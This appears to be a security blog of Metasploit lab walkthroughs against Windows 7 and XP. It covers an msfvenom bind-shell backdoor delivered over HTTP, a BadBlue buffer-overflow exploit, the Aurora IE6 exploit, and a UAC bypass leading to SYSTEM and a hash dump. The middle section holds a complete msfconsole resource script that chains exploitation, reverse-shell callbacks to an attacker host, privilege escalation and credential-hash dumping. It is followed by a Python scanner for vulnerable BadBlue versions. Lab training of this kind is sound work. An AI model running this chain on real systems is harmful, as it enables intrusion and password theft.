
Friday, June 10, 2016

METASPLOIT - Windows 7 - Bind TCP Shell


WINDOWS 7 - BIND TCP SHELL

- Layout for this exercise:



msfvenom generates a Metasploit payload in a chosen output format (raw shellcode, an executable, a DLL, and so on). In this case the
windows/meterpreter/bind_tcp payload is written out as a Windows executable (.exe) with these options:

-a x86 = 32-bit x86 architecture, so the resulting file is a PE32 image
-f exe = executable output format (a PE file rather than raw shellcode)

A bind payload makes the victim listen on LPORT (4444 unless changed when the file is generated); the attacker later connects to that port.





- The file command confirms that bind_tcp.exe is a PE32 executable, which is what the -a x86 option should produce. PE (Portable Executable) is the file format used for executables, object code, DLLs, font files and others on 32-bit and 64-bit versions of Windows; file reports 64-bit images as PE32+.



- On the Kali attacker side, Python's SimpleHTTPServer module is started from the directory containing bind_tcp.exe; it serves that directory over HTTP on port 8000:



- The victim Windows 7 connects to the attacker's web server and downloads bind_tcp.exe:







- The client (victim) Windows 7 has now downloaded bind_tcp.exe, a backdoor which, if executed, opens a listening TCP port on the victim that the attacker can connect to.

- On the attacker side, the SimpleHTTPServer log shows the GET request for bind_tcp.exe coming from the victim's IP, 192.168.1.14:









- Then the attacker configures exploit/multi/handler with the same payload used by msfvenom, windows/meterpreter/bind_tcp. With a bind payload it is the handler that initiates the connection, so RHOST is set to the victim's IP 192.168.1.14 (and LPORT must match the port compiled into the executable); the handler keeps retrying until the victim runs the file:




- On the client side, the victim executes bind_tcp.exe:





- Now, Windows 7 is running bind_tcp.exe:





- As a consequence, on the attacker side a meterpreter session is automatically created by the handler:





- Running netstat on both Windows 7 and Kali shows how a connection has been established between the victim and the attacker:








- However, a host firewall on the victim blocks the inbound connection the bind payload depends on. Let's see what happens when Windows Firewall is turned on:






- When the victim runs bind_tcp.exe, the program starts and tries to listen, but Windows Firewall immediately intercepts the attempt to accept inbound connections and shows its security alert:





- Only if the victim clicks Allow access (which would be unwise) does the firewall permit the inbound connection, and only then does the handler's connection succeed.

- The conclusion is that bind shell payloads are unreliable whenever a firewall sits between attacker and victim, because host and network firewalls are normally configured to block unsolicited INBOUND connections while permitting OUTBOUND ones. The solution is a reverse shell payload, where the victim connects out to the attacker; strict egress filtering can still stop that, so reverse payloads usually use a port that outbound policy allows, such as 443.







METASPLOIT - Windows 7 - Bypassing User Account Control


WINDOWS 7 - BYPASSING USER ACCOUNT CONTROL



- Layout for this exercise:




- Let's suppose we have a Windows 7 system already exploited:




- From Control Panel -> User Accounts and Family Safety -> User Accounts -> Change User Account Control Settings:




In this case Windows 7 has User Account Control (UAC) set to the Default level ("Notify me only when programs try to make changes to my computer"). This matters: the bypass used below relies on the auto-elevation behaviour of this level and on the compromised user being a member of the local Administrators group; with UAC set to Always notify it does not work:








- Let's exploit the system with badblue_passthru:




- However, the resulting session cannot obtain full (SYSTEM) control of the machine: UAC keeps the process at medium integrity even though the user is an administrator:




- Privileged post-exploitation (getsystem, hashdump and similar) therefore fails:




- Before attempting the UAC bypass it is advisable to run from the most stable process available. The current meterpreter process is badblue.exe, the exploited service, which could crash or be closed at any time:










- It is a good idea to migrate to a longer-lived process such as explorer.exe, using the PID shown by ps:







- To start the UAC bypass, with the aim of getting full control over the victim, the current meterpreter session is sent to the background with the background command:





- At the moment, there is only 1 meterpreter session active:




- Metasploit includes a local exploit module for bypassing User Account Control:





- For this exploit the SESSION option, the existing meterpreter session to run from, is required:




- So, session is set to 1:




- Also, the windows/meterpreter/reverse_tcp payload is used, with LHOST set to the attacker's IP (a reverse payload, so the newly elevated process connects back to the attacker):




- The exploit is launched, and a second meterpreter session is achieved as a result:




- Now, from this second, high-integrity meterpreter session, privilege escalation with getsystem succeeds and the session runs as NT AUTHORITY\SYSTEM:





- A good example of post-exploitation is the hashdump command, which (now that the session is SYSTEM) dumps the NTLM password hashes of the local accounts from the SAM:




- Also, the post/windows/gather/smart_hashdump module dumps the hashes into a text file (stored as loot) for further offline processing, for instance cracking with John the Ripper:
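The whole chain of this post, from the badblue_passthru exploit to the hash dump, can be written as one msfconsole resource script. This is an added example, not the commands from the original screenshots, and it makes several assumptions: the UAC module is exploit/windows/local/bypassuac (the post does not name the module it used), the initial exploit uses the reverse_tcp payload, the attacker's address is 192.168.1.10 (a constructed value; the post never states it), migration is done with post/windows/manage/migrate instead of interactively with ps and migrate, and the 2016-era option name RHOST is used (newer Metasploit versions call it RHOSTS):

```msf
# bypass_uac.rc  (run with: msfconsole -q -r bypass_uac.rc)
# Victim: 192.168.1.14 running vulnerable BadBlue.  Attacker: 192.168.1.10 (constructed).

# 1. Initial access: opens session 1 at medium integrity.
#    -z = do not interact with the session, so the script keeps running.
use exploit/windows/http/badblue_passthru
set RHOST 192.168.1.14
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit -z

# 2. Move out of badblue.exe into a long-lived process before touching UAC.
#    (Interactive equivalent: sessions -i 1, ps, migrate <explorer.exe PID>, background)
use post/windows/manage/migrate
set SESSION 1
set NAME explorer.exe
set SPAWN false
run

sessions -l

# 3. UAC bypass: runs from session 1, spawns an elevated process that calls back
#    on a second port and opens session 2 at high integrity.
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4445
exploit -z

# 4. Escalation and hash dump from the elevated session.
#    (Interactive equivalent: sessions -i 2, getsystem, getuid, hashdump)
use post/windows/escalate/getsystem
set SESSION 2
run

use post/windows/gather/smart_hashdump
set SESSION 2
run

sessions -l
```

Two handlers on different LPORTs are needed because session 1 and session 2 are separate reverse connections; reusing 4444 for the bypass while the first handler still owns it fails. If step 3 opens no session, check the UAC level and that the user is a local administrator, as noted above.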

















METASPLOIT - Windows 7 - Exploitation


WINDOWS 7 - EXPLOITATION


- Layout for this exercise:





- BadBlue is a file-sharing web server application for Windows that lets users share files over HTTP.

http://www.badblue.com/down.htm


- However, versions 2.72b and earlier suffer from a stack-based buffer overflow in the PassThru functionality of ext.dll, which allows remote code execution on the server:

https://www.exploit-db.com/exploits/16806/


- Once BadBlue has been downloaded and installed and the license agreement accepted, it is running on Windows 7 and listening on TCP port 80:





- The attacker, scanning the victim, detects the BadBlue web server running on port 80 (the Server header identifies the product and version):
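Service detection like the one above comes down to reading the HTTP Server header and comparing the version against the affected range given in the exploit-db entry (2.72b and earlier). The following is an added example, not code from this post: parse_server_header() and badblue_version() work on raw response bytes, grab_banner() is the live version for use against a lab host, and the two sample responses are constructed here (the exact Server string a real BadBlue install returns is assumed to look like BadBlue/2.72b):

```python
import re
import socket
from typing import Optional, Tuple

# Affected range per the exploit-db entry cited above: 2.72b and earlier.
LAST_VULNERABLE = (2, 72, "b")

Version = Tuple[int, int, str]


def parse_server_header(raw_response: bytes) -> Optional[str]:
    """Return the HTTP Server header value from a raw response, or None."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def badblue_version(server_header: Optional[str]) -> Optional[Version]:
    """Extract (major, minor, suffix) from e.g. 'BadBlue/2.72b'; None if not BadBlue."""
    m = re.match(r"BadBlue/(\d+)\.(\d+)([a-z]?)", server_header or "", re.IGNORECASE)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), m.group(3).lower())


def is_vulnerable(version: Version) -> bool:
    """True for 2.72b and earlier. Tuple order handles the letter suffix:
    2.72 (no suffix) < 2.72b < 2.72c, and 2.73 is past the range."""
    return version <= LAST_VULNERABLE


def assess(raw_response: bytes) -> dict:
    """Combine the steps into the verdict the attacker wants before picking a module."""
    server = parse_server_header(raw_response)
    version = badblue_version(server)
    return {
        "server": server,
        "badblue": version is not None,
        "vulnerable": bool(version and is_vulnerable(version)),
    }


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Live banner grab for a lab host (not exercised offline): minimal HEAD request."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data


# Constructed sample responses, not captured from a real server.
SAMPLE_VULNERABLE = (b"HTTP/1.1 200 OK\r\n"
                     b"Server: BadBlue/2.72b\r\n"
                     b"Content-Type: text/html\r\n\r\n"
                     b"<html>...</html>")
SAMPLE_OTHER = b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.18\r\n\r\n"

if __name__ == "__main__":
    # Usage: python badblue_check.py 192.168.1.14
    import sys
    raw = grab_banner(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_VULNERABLE
    print(assess(raw))
```

A banner can be edited or absent, so a "vulnerable: False" verdict is not proof of safety; but a positive match on an in-range version is exactly the evidence needed before selecting badblue_passthru below.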



















- Searching the Metasploit Framework for BadBlue exploits (search badblue):




- Let's try this exploit:






- Options for this exploit are simple:






















- RHOST is set to the victim's IP:





- The exploitation is successful:




Wednesday, June 8, 2016

METASPLOIT - Windows XP - Aurora - Internet Explorer 6




WINDOWS XP - AURORA - INTERNET EXPLORER 6


- Layout for this exercise:




 
- Internet Explorer 6 suffers from a memory corruption (use-after-free) vulnerability, MS10-002 / CVE-2010-0249, known as "Aurora". This is a client-side attack: the attacker hosts a malicious web page and the victim opens it with Internet Explorer 6, which triggers the flaw and runs the payload. It works against old, unpatched systems such as Windows XP with a browser that has not been updated.






- Metasploit provides the module ms10_002_aurora to take advantage of this vulnerability:

  


- Required options for this exploit:




- The SRVPORT can be the usual TCP 80:




- SRVHOST is the address the malicious web server binds to, i.e. the attacker's local IP:







- URIPATH is the path the victim must request to trigger the exploit (Metasploit randomizes it by default). In this case it is set to /, so any request to the server's root triggers it:




- The exploit is run and the web server starts on the attacker side, waiting for a client to connect:






- From the client side, the victim XP browses to the attacker's web server with Internet Explorer 6:





- Then, a meterpreter session (1) is opened:









- Interacting with session 1, post exploitation can be done over the victim XP: